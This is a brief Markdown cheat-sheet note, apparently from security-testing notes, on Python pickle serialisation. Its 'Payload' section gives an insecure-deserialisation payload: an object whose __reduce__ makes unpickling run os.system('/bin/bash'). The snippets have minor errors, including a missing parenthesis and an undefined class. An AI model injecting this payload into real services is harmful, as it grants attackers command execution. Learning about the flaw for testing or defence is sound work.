40 lines
787 B
Markdown
40 lines
787 B
Markdown
# Pickle
|
|
|
|
Serializes a Python object into a byte stream an back.
|
|
When sending pickled data through a network do base64 encoding first to prevent
|
|
special characters to do something unexpected.
|
|
|
|
```python
|
|
import pickle
|
|
import base64
|
|
|
|
|
|
text = "Hello, World!"
|
|
pickled = pickle.dumps(text)
|
|
send_data = base64.b64encode(pickled)
|
|
receive_data = base64.b64decode(send_data)
|
|
unpickled = pickle.loads(pickled)
|
|
```
|
|
|
|
## Payload
|
|
|
|
The following payload can be injected into a pickled object.
|
|
|
|
```python
|
|
import pickle
|
|
import os
|
|
import base64
|
|
class evil_object(object):
|
|
def __reduce__(self):
|
|
return(os.system, ('/bin/bash',))
|
|
x = evil_object()
|
|
y = pickle.dumps(x)
|
|
base64.b64encode(y)
|
|
```
|
|
|
|
* Dump serialized object via
|
|
|
|
```python
|
|
pickle.dump(SerializedPickle(), open('pickled.out', 'wb')
|
|
```
|